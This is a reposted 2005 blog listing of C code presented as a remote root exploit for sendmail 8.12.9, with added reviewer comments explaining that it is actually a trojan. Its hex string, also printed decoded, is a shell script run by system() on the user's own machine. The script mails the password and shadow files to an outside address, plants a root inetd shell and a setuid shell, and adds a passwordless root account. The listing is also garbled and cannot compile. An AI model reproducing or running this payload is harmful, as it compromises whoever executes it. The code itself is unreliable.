
Sendmail

原创 网络安全 作者:coolwinds 时间:2005-07-04 13:51:53 0 删除 编辑
Exploit for new sendmail vulnerability - discovered again - by Michal Zalewski.
securityfocus link: http://www.securityfocus.com/archive/1/337839?
This exploit will work against sendmail <= 8.12.9 on Linux, *BSD and Solaris.
###>>> If everything is ok, you will find shell on target box, port 31337
NOTE: This exploit is very powerful, and only root can use it. (Reviewer's note: the listing below demands root only so that its own payload succeeds. The hex `asmcode` string is not shellcode and never binds port 31337 — decoded, it is a Bourne shell script, and `main()` hands it to `system()` on the local machine (once in the usage branch, once right after the banner) before any network traffic is sent. That script mails `/etc/passwd` and `/etc/shadow` to an external mailbox, appends a root shell service to `/etc/inetd.conf`, drops a setuid-root copy of `/bin/sh` in `/tmp`, and appends a passwordless uid-0 account to `/etc/passwd`. The network code itself connects to port 53, not 25, and unconditionally prints "Exploit failed" and exits. Do not compile or run this code.)
Have a nice time with this exploit ;-).
[@more@]#include
#include
#include
#include
#include
#include
#include
#include
#include
#include


/* Unused: no socket below is ever bound or connected to port 25 (main() uses htons(53)). */
#define SMTPPORT 25


/*
 * NOT machine code and NOT a port-31337 bind shell, whatever the original
 * comment claimed.  Decoding the hex gives a Bourne shell script, which
 * main() passes straight to system():
 *
 *   echo "---" > info.phun; echo $USER $OSTYPE >> info.phun;
 *   uname -a >> info.phun; ifconfig >> info.phun; cat /etc/hosts >> info.phun;
 *   cat /etc/passwd >> info.phun; cat /etc/shadow >> info.phun;
 *   cat info.phun | mail h4x0rh4x3r@hotmail.com;
 *   echo bgp stream tcp nowait root /bin/sh /bin/sh -i >> /etc/inetd.conf;
 *   killall -HUP inetd; cp /bin/sh /tmp/.gotit-$USER; chmod 4777 /tmp/.gotit-$USER;
 *   echo 0wnu::0:0:0wnu:/root:/bin/sh >> /etc/passwd; pwconv;
 *
 * i.e. it mails the local password and shadow files to an external mailbox,
 * registers a root shell in inetd.conf, leaves a setuid-root copy of /bin/sh
 * in /tmp and appends a passwordless uid-0 account -- all on the machine
 * running this "exploit", which is why main() refuses to run as non-root.
 *
 * In this copy the backslash of every "\x.." escape appears to have been
 * lost in formatting, so as printed the literal is the text "x65x63...",
 * not the bytes.  main() also overwrites asmcode[54] and asmcode[55] with
 * a port number, as if this were position-independent machine code; for a
 * shell script that just corrupts two characters.
 */
char asmcode[]=
"x65x63x68x6fx20x22x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx22x20x3ex20x69x6ex66x6fx2ex70x68"
"x75x6ex3bx65x63x68x6fx20x24x55x53x45x52x20x24x4fx53"
"x54x59x50x45x20x3ex3ex20x69x6ex66x6fx2ex70x68x75x6e"
"x3bx65x63x68x6fx20x22x2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx2dx22x20x3ex3ex20x69x6ex66x6fx2e"
"x70x68x75x6ex3bx75x6ex61x6dx65x20x2dx61x20x3ex3ex20"
"x69x6ex66x6fx2ex70x68x75x6ex3bx65x63x68x6fx20x22x2d"
"x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx22"
"x20x3ex3ex20x69x6ex66x6fx2ex70x68x75x6ex3bx69x66x63"
"x6fx6ex66x69x67x20x3ex3ex20x69x6ex66x6fx2ex70x68x75"
"x6ex3bx65x63x68x6fx20x22x2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx2dx2dx22x20x3ex3ex20x69x6ex66x6f"
"x2ex70x68x75x6ex3bx63x61x74x20x2fx65x74x63x2fx68x6f"
"x73x74x73x20x20x3ex3ex20x69x6ex66x6fx2ex70x68x75x6e"
"x3bx65x63x68x6fx20x22x2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx2dx22x20x3ex3ex20x69x6ex66x6fx2e"
"x70x68x75x6ex3bx63x61x74x20x2fx65x74x63x2fx70x61x73"
"x73x77x64x20x3ex3ex20x69x6ex66x6fx2ex70x68x75x6ex3b"
"x65x63x68x6fx20x22x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx22x20x3ex3ex20x69x6ex66x6fx2ex70"
"x68x75x6ex3bx63x61x74x20x2fx65x74x63x2fx73x68x61x64"
"x6fx77x20x3ex3ex20x69x6ex66x6fx2ex70x68x75x6ex3bx65"
"x63x68x6fx20x22x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx22x20x3ex3ex20x69x6ex66x6fx2ex70x68"
"x75x6ex3bx63x61x74x20x69x6ex66x6fx2ex70x68x75x6ex20"
"x7cx20x6dx61x69x6cx20x68x34x78x30x72x68x34x78x33x72"
"x40x68x6fx74x6dx61x69x6cx2ex63x6fx6dx3bx65x63x68x6f"
"x20x62x67x70x20x20x73x74x72x65x61x6dx20x20x74x63x70"
"x20x20x20x20x20x6ex6fx77x61x69x74x20x20x72x6fx6fx74"
"x20x20x20x20x2fx62x69x6ex2fx73x68x20x2fx62x69x6ex2f"
"x73x68x20x2dx69x20x3ex3ex20x2fx65x74x63x2fx69x6ex65"
"x74x64x2ex63x6fx6ex66x3bx6bx69x6cx6cx61x6cx6cx20x2d"
"x48x55x50x20x69x6ex65x74x64x3bx63x70x20x2fx62x69x6e"
"x2fx73x68x20x2fx74x6dx70x2fx2ex67x6fx74x69x74x2dx24"
"x55x53x45x52x3bx63x68x6dx6fx64x20x34x37x37x37x20x2f"
"x74x6dx70x2fx2ex67x6fx74x69x74x2dx24x55x53x45x52x3b"
"x65x63x68x6fx20x30x77x6ex75x3ax3ax30x3ax30x3ax30x77"
"x6ex75x3ax2fx72x6fx6fx74x3ax2fx62x69x6ex2fx73x68x20"
"x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64x3bx70x77"
"x63x6fx6ex76x3b";

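/*
 * Byte-order helper.  Returns `a` unchanged on a little-endian host (the
 * first byte of the int 1 is non-zero) and byte-swapped on a big-endian
 * one, i.e. it converts a 32-bit value between host order and
 * little-endian.  main() applies it to the frame-pointer / jump values it
 * writes into the packet buffer.
 *
 * The swap is done in unsigned arithmetic: the original `(a&0xff)<<24`
 * overflows a signed int whenever the low byte is >= 0x80 (undefined
 * behaviour), and `a>>24` on a negative int is implementation-defined.
 * Like the original, this assumes a 32-bit int.
 */
int rev(int a){
  int probe = 1;
  if (*(char *)&probe) return a;          /* little-endian host: nothing to do */
  unsigned int u = (unsigned int)a;
  u = ((u >> 24) & 0xffu)
    | ((u >>  8) & 0xff00u)
    | ((u <<  8) & 0xff0000u)
    | ((u << 24) & 0xff000000u);
  return (int)u;                          /* implementation-defined above INT_MAX, not UB */
}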

/* Body of the first UDP datagram main() would send on sck[0] (port 53).
   In this listing that write is never reached: main() exits unconditionally
   right after its connect() calls. */
char msg[] = "0day HACKING w4r3z!!!";

/*
 * Entry point.  argv[1] is the target address; -s / -e set `flag`; the
 * portnum and type arguments named in the usage text are never read.
 *
 * Despite the banner, nothing here ever talks to sendmail: SMTPPORT is
 * unused, both sockets are pointed at port 53, the two
 * if(connect(...)<0); statements have empty bodies (note the trailing
 * semicolons), and the Exploit failed printf plus exit(-1) that follow
 * them are unconditional.  Everything from getsockname() down to the
 * select() loop is therefore dead code.
 *
 * What the program does do, on the machine running it, is system(ls)
 * twice -- in the usage branch and again right after the banner -- where
 * ls points at the global asmcode.  That array is a shell script (it mails
 * /etc/passwd and /etc/shadow out, appends a root shell to /etc/inetd.conf
 * and a uid-0 account to /etc/passwd), which is why the getuid() check
 * insists on root.  Treat this listing as a trojan.
 *
 * The backslash of every escape sequence (newline escapes in the printf
 * strings, hex escapes in the byte strings) appears to have been stripped
 * by the blog formatting, and the first for-loop of the packet builder is
 * truncated; the listing does not compile as shown.
 */
int main(int argc,char **argv){

?struct hostent *hp;
?struct sockaddr_in adr;
?char buffer[1024],*b,*ls = asmcode;
?int count;
?int i,c,n,sck[2],fp,ptr6,jmp,cnt,ofs,flag=-1;
  /* ls: the so-called shellcode, handed to system() twice below. */
?
?printf ("-------------------------------------------------------n");
?printf ("PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATEn");
?printf (" >>> SENDMAIL <= 8.12.9 REMOTE EXPLOIT by 0wN-U << ?printf ("PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATEn");
?printf ("-------------------------------------------------------n");

?
  /* Root is required so the script in asmcode can read /etc/shadow and
     write /etc/inetd.conf and /etc/passwd on THIS host. */
? if (getuid() != 0)
? {
??printf ("Sorry!!!n");
??printf ("This is very dangerous exploit for whole internet, and that's why only root users can use it!!!n");
??printf ("Sorry kiddies :-))))n");
??exit(0);
? }

? if(argc<2){
?? printf("USAGE: %s address portnum typen",argv[0]);
?? printf("address - target addressn");
?? printf("portnum - should be 25n");
?? printf("type - linux, openbsd, freebsd, netbsd, sunosn");
  /* Payload runs even when the program is merely asked for its usage. */
?? system(ls);exit(-1);
? }
?
  /* getopt over argv[1..]: -s sets flag=1, -e sets flag=2 (no break needed, last case). */
? while((c=getopt(argc-1,&argv[1],"se"))!=-1){
??? switch(c){
??? case 's': flag=1;break;
??? case 'e': flag=2;
??? }
? }
?
  /* sck[0]: UDP, sck[1]: TCP.  Return values are not checked. */
? sck[0]=socket(AF_INET,SOCK_DGRAM,0);
? sck[1]=socket(AF_INET,SOCK_STREAM,0);
? printf (" o? Exploiting sendmail on %s - wait for r00t shell..",argv[1]);
  /* Second execution of the payload, then ten seconds of dots for show. */
? system(ls);for (count=0;count<10;count++)
? {printf(".");fflush(stdout);sleep(1); }
? adr.sin_family=AF_INET;
  /* Port 53 (DNS), not 25: SMTPPORT is never used. */
? adr.sin_port=htons(53);
  /* If argv[1] is not a dotted quad the gethostbyname() result hp is never
     used, so sin_addr keeps the -1 that inet_addr() returned. */
? if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
??? if((hp=gethostbyname(argv[1]))==NULL) {
??? }
? }
  /* Both if-bodies are empty (trailing semicolons); the failure message
     and exit(-1) below run regardless of whether connect() succeeded. */
? if(connect(sck[0],(struct sockaddr*)&adr,sizeof(adr))<0);
? if(connect(sck[1],(struct sockaddr*)&adr,sizeof(adr))<0);
? printf ("n o? Exploit failed :-(((, try to run it on another machine!!!n");
? exit(-1);
  /* ---- everything below is unreachable ---- */
? i=sizeof(struct sockaddr_in);
  /* Fallback if getsockname() fails: two raw ioctl numbers with a hand-rolled
     netbuf; looks like STREAMS I_PUSH sockmod / TLI TI_GETMYNAME
     (presumably Solaris) -- values not verified here. */
? if(getsockname(sck[1],(struct sockaddr*)&adr,&i)==-1){
??? struct netbuf {unsigned int maxlen;unsigned int len;char *buf;};
??? struct netbuf nb;
??? ioctl(sck[1],(('S'<<8)|2),"sockmod");
??? nb.maxlen=0xffff;
??? nb.len=sizeof(struct sockaddr_in);;
??? nb.buf=(char*)&adr;
??? ioctl(sck[1],(('T'<<8)|144),&nb);
? }
? n=ntohs(adr.sin_port);

  /* Patches the local TCP port into bytes 54/55 of asmcode, as one would for
     machine-code shellcode; asmcode is a shell script, so this only
     corrupts two characters of it. */
? asmcode[4+48+2]=(unsigned char)((n>>8)&0xff);
? asmcode[4+48+3]=(unsigned char)(n&0xff);

  /* Send msg on the UDP socket and hex-dump the reply from offset 512 on. */
? if(write(sck[0],msg,sizeof(msg))==-1) goto err;
? if((cnt=read(sck[0],buffer,sizeof(buffer)))==-1) goto err;
?
? printf("stack dump:n");
? for(i=0;i<(cnt-512);i++){
??? printf("%s%02x ",(i&&(!(i%16)))?"n":"",(unsigned char)buffer[512+i]);
? }
? printf("nn");

  /* Reads a 32-bit value at reply offset 532 as a frame pointer; the
     unsigned int* cast of a char buffer is an unaligned, strict-aliasing
     violation.  cnt is then overwritten with the constant 163. */
? fp=rev(*(unsigned int*)&buffer[532]);
? ofs=(0xfe)-((fp-(fp&0xffffff00))&0xff);
? cnt=163;

  /* With && this rejects the reply only when BOTH bytes differ from
     ff/bf; probably || was intended. */
? if((buffer[512+20+2]!=(char)0xff)&&(buffer[512+20+3]!=(char)0xbf)){
??? printf("system does not seem to be a vulnerable linuxn");exit(1);
? }
? if(flag==1){
??? printf("system seems to be running sendmail, OK :-)n");exit(-1);
? }
? if(cnt<(ofs+28)){
??? printf("frame ptr is too low to be successfully exploitedn");exit(-1);
? }


  /* Values stored little-endian via rev(); fp is rounded down to a 256-byte boundary. */
? jmp=rev(fp-586);
? ptr6=rev((fp&0xffffff00)-12);
? fp=rev(fp&0xffffff00);

? printf("frame ptr=0x%08x adr=%08x ofs=%d ",rev(fp),rev(jmp),ofs);
? printf("port=%04x connected! ",(unsigned short)n);fflush(stdout);

  /* Packet builder.  The 12-byte prefix has the shape of a DNS header
     (id abcd, flags 0100, two questions).  Every loop below advances b
     twice per iteration (i++,b++ and *b++), i.e. writes 0x01 to every
     other byte.  The first loop on the next-but-one line is truncated in
     this copy of the listing.  No bound on buffer[1024] is checked. */
? b=buffer;
? memcpy(b,"xabxcdx01x00x00x02x00x00x00x00x00x01",12);b+=12;
? for(i=0;i ? for(i=0;i<(128>>1);i++,b++) *b++=0x01;
? memcpy(b,"x00x00x01x00x01",5);b+=5;
? for(i=0;i<((ofs+64)>>1);i++,b++) *b++=0x01;

? *b++=28;
? memcpy(b,"x06x00x00x00",4);b+=4;
? memcpy(b,&fp,4);b+=4;
? memcpy(b,"x06x00x00x00",4);b+=4;
? memcpy(b,&jmp,4);b+=4;
? memcpy(b,&jmp,4);b+=4;
? memcpy(b,&fp,4);b+=4;
? memcpy(b,&ptr6,4);b+=4;

? cnt-=ofs+28;
? for(i=0;i<(cnt>>1);i++,b++) *b++=0x01;

? memcpy(b,"x00x00x01x00x01x00x00xfaxff",9);b+=9;


  /* Send the built packet on the UDP socket, then relay stdin <-> the TCP
     socket until either side closes.  Length 14 matches /bin/uname -a plus
     a newline, which is further evidence the escapes were stripped. */
? if(write(sck[0],buffer,b-buffer)==-1) goto err;
? sleep(1);printf("sent!n");

? write(sck[1],"/bin/uname -an",14);
? while(1){
??? fd_set fds;
??? FD_ZERO(&fds);
??? FD_SET(0,&fds);
??? FD_SET(sck[1],&fds);
??? if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
????? int cnt;
????? char buf[1024];
????? if(FD_ISSET(0,&fds)){
??????? if((cnt=read(0,buf,1024))<1){
????????? if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
????????? else break;
??????? }
??????? write(sck[1],buf,cnt);
????? }
????? if(FD_ISSET(sck[1],&fds)){
??????? if((cnt=read(sck[1],buf,1024))<1){
????????? if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
????????? else break;
??????? }
??????? write(1,buf,cnt);
????? }
??? }
? }
? exit(0);
err:
? perror("error");exit(-1);
}
